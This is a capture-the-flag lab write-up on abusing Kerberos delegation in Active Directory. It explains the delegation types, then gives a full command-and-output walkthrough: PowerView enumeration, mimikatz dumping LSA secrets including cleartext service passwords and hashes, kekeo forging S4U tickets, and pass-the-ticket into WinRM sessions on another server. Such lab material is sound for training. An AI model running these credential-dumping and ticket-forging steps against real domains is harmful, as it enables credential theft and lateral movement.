Exploiting kerberos delegation
The general purpose of Kerberos delegation is to allow an application or service to access a resource on another machine on behalf of a user or machine. If a user logs into an application, the application will request resources on other machines on behalf of the user. It removes the need for a global service account with less granular permissions.
Unconstrained Delegation
With Unconstrained Delegation, a host has no limit on the resources it can access on behalf of a user who connects,
as long as the user has the TRUSTED_FOR_DELEGATION flag set. Once a user connects, the host requests a TGT for the
user and caches it locally for future use.
Given the TGT, an attacker could proceed to access any resource accessible by the user owner of the TGT. For example, if an Administrator logged on to the host with unconstrained delegation, the attacker would now be in possession of the Administrator’s TGT.
Constrained Delegation
Constrained Delegation restricts the type of services a service acount can request on behalf of a user. For example, if a domain service account (sevice principal) was running a web application on a web server, constrained delegation would enable the administrator to choose which services to delegate access to on behalf of another user. An administrator could selectively filter delegation to resources such as HTTP, CIFS, LDAP, HOST, MSSQL, etc.
If an attacker compromised a host configured for constrained delegation and obtained the NTLM hash or password of the service account, the attacker could request a TGT for the service account and use the TGT to request a TGS for the delegate account to access a particular service.
Resource-Based Constrained Delegation
This model of delegation works inversely from the other delegation types. Introduced by Microsoft in 2012, Resource-Based Constrained Delegation (RBCD) once again provided additional restrictions on Kerberos Delegation for security. RBCD changes the delegation model entirely. Instead of specifying which object can delegate to which service, the service now specifies which objects can delegate to it. This allows the service owner to control who can access it.
For example, if we have permission to configure RBCD for a service, we have the ability to set the
msDS-AllowedToActOnBehalfOfOtherIdentity attribute for the AD Object. We can populate this attribute with the
details of an AD account that we have access to. To now gain access to the service, we can generate a TGT for the
account we control, which will allow us to interact with this service.
Lab: Constrained Delegation Exploitation
Using the tier 2 admin credentials gained in the permissions exploitation, RDP to THMWRK1 as T2 Admin for some enumeration and exploitation.
Enumeration
Use PowerView and the Get-NetUser cmdlet of PowerSploit for this enumeration. PowerView is going to almost
always get detected by antivirus!
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\t2_alan.riley> Import-Module C:\tools\PowerView.ps1
PS C:\Users\t2_alan.riley> Get-NetUser -TrustedToAuth
logoncount : 43
badpasswordtime : 11/7/2022 3:13:34 PM
distinguishedname : CN=IIS Server,CN=Users,DC=za,DC=tryhackme,DC=loc
objectclass : {top, person, organizationalPerson, user}
displayname : IIS Server
lastlogontimestamp : 11/6/2022 6:03:06 PM
userprincipalname : svcIIS@za.tryhackme.loc
name : IIS Server
objectsid : S-1-5-21-3885271727-2693558621-2658995185-6155
samaccountname : svcIIS
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 11/6/2022 6:03:06 PM
instancetype : 4
usncreated : 78494
objectguid : 11e42287-0a25-4d73-800d-b62e2d2a2a4b
sn : Server
lastlogoff : 1/1/1601 12:00:00 AM
msds-allowedtodelegateto : {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc,
http/THMSERVER1}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=tryhackme,DC=loc
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : HTTP/svcServWeb.za.tryhackme.loc
givenname : IIS
lastlogon : 11/7/2022 3:14:12 PM
badpwdcount : 0
cn : IIS Server
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
whencreated : 4/27/2022 11:26:21 AM
primarygroupid : 513
pwdlastset : 4/29/2022 11:50:25 AM
usnchanged : 147565
There is only one user allowed to act as a delegate for other users, namely svcIIS@za.tryhackme.loc. This account
is allowed to delegate access to WSMAN/THMSERVER1.za.tryhackme.loc and http/THMSERVER1.za.tryhackme.loc.
PS C:\Users\t2_alan.riley> Get-CimInstance -ClassName Win32_Service | Where-Object {$_.StartName -like 'svcIIS*'} | Select-Object *
Name : thmwinauth
Status : OK
ExitCode : 0
DesktopInteract : False
ErrorControl : Normal
PathName : C:\Windows\system32.cmd.exe
ServiceType : Own Process
StartMode : Auto
Caption : thmwinauth
Description :
InstallDate :
CreationClassName : Win32_Service
Started : False
SystemCreationClassName : Win32_ComputerSystem
SystemName : THMWRK1
AcceptPause : False
AcceptStop : False
DisplayName : thmwinauth
ServiceSpecificExitCode : 0
StartName : svcIIS@za.tryhackme.loc
State : Stopped
TagId : 0
CheckPoint : 0
DelayedAutoStart : True
ProcessId : 0
WaitHint : 0
PSComputerName :
CimClass : root/cimv2:Win32_Service
CimInstanceProperties : {Caption, Description, InstallDate, Name...}
CimSystemProperties : Microsoft.Management.Infrastructure.CimSystemProperties
At system startup, the svcIIS account will auto-start a service which executes C:\Windows\system32.cmd.exe.
That spawns a command prompt and causes the credential to be cached in memory.
Dumping secrets with mimikatz
token::elevate - To dump the secrets from the registry hive, we need to impersonate the
SYSTEMuser.lsadump::secrets - Mimikatz interacts with the registry hive to pull the clear text credentials.
PS C:\Users\t2_alan.riley> C:\Tools\mimikatz_trunk\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
488 {0;000003e7} 1 D 17781 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;002e7dc8} 5 D 3496925 ZA\t2_alan.riley S-1-5-21-3885271727-2693558621-2658995185-5243
(14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 3528379 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942
Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 )
Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 )
Domain FQDN : za.tryhackme.loc
Policy subsystem is : 1.18
LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27}
[00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a95c2af4463
Secret : $MACHINE.ACC
cur/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g GQsb%),mlWLo?6$kqP
NTLM:4207d1b7e4b942da2371174b772fdf5e
SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db
old/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g GQsb%),mlWLo?6$kqP
NTLM:4207d1b7e4b942da2371174b772fdf5e
SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db
Secret : DefaultPassword
old/text: vagrant
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 5e 3f 03 8d 79 49 90 e7 2e e0
full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 02 0b c1 5b 24 f4 44 d0 74 31
full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431
m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431
Secret : NL$KM
cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58
old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58
Secret : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@
mimikatz #
Revert token:
mimikatz # token::revert
* Process Token : {0;002e7dc8} 5 D 3496925 ZA\t2_alan.riley S-1-5-21-3885271727-2693558621-2658995185-5243
(14g,24p) Primary
* Thread Token : no token
mimikatz #
Kekeo
Start kekeo in another Windows PowerShell session:
PS C:\Users\t2_alan.riley> C:\Tools\kekeo\x64\kekeo.exe
___ _ kekeo 2.1 (x64) built on Dec 14 2021 11:51:55
/ ('>- "A La Vie, A L'Amour"
| K | /* * *
\____/ Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
L\_ https://blog.gentilkiwi.com/kekeo (oe.eo)
with 10 modules * * */
kekeo #
Generate a TGT using the svcIIS credentials that can be used to generate tickets for the HTTP and WSMAN services:
kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
Realm : za.tryhackme.loc (za)
User : svcIIS (svcIIS)
CName : svcIIS [KRB_NT_PRINCIPAL (1)]
SName : krbtgt/za.tryhackme.loc [KRB_NT_SRV_INST (2)]
Need PAC : Yes
Auth mode : ENCRYPTION KEY 23 (rc4_hmac_nt ): 43460d636f269c709b20049cee36ae7a
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
> Ticket in file 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'
Request S4U TGSs on behalf of t1_trevor.jones to the HTTP service and the WSMAN service on THMSERVER1
using the TGT:
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Ticket : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
[krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
[krb-cred] E: [00000012] aes256_hmac
[enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
[enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
[enc-krb-cred] T: [11/7/2022 5:32:55 PM ; 11/8/2022 3:32:55 AM] {R:11/14/2022 5:32:55 PM}
[enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac ): ca2a5e5711972b192ef977c453cbf03096da849170c107db7fad1535852c1122
[s4u2self] t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
> Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
[s4u2proxy] http/THMSERVER1.za.tryhackme.loc
> Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'
kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
Ticket : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
[krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
[krb-cred] E: [00000012] aes256_hmac
[enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
[enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
[enc-krb-cred] T: [11/7/2022 5:32:55 PM ; 11/8/2022 3:32:55 AM] {R:11/14/2022 5:32:55 PM}
[enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac ): ca2a5e5711972b192ef977c453cbf03096da849170c107db7fad1535852c1122
[s4u2self] t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
> Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
[s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc
> Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'
Back to mimikatz
Inject the S4U TGS tickets into the current session as the tier 2 admin and launch a command
prompt:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF63D4543B8
In the command prompt, and check the tickets were injected into the session:
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\t2_alan.riley>klist
Current LogonId is 0:0x2e7dc8
Cached Tickets: (2)
#0> Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 11/7/2022 17:37:37 (local)
End Time: 11/8/2022 3:32:55 (local)
Renew Time: 11/14/2022 17:32:55 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
#1> Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
Server: wsman/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 11/7/2022 17:38:04 (local)
End Time: 11/8/2022 3:32:55 (local)
Renew Time: 11/14/2022 17:32:55 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
C:\Users\t2_alan.riley>winrs winrs -r:thmserver1.za.tryhackme.loc cmd
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\t1_trevor.jones>
As an alternative, use a Powershell session:
mimikatz # exit
Bye!
PS C:\Users\t2_alan.riley> New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
1 WinRM1 thmserver1.z... RemoteMachine Opened Microsoft.PowerShell Available
PS C:\Users\t2_alan.riley> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents>
Get the flag
PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/30/2022 2:10 PM 92 flag2.txt
[thmserver1.za.tryhackme.loc]: PS C:\Users\Administrator\Desktop> cat flag2.txt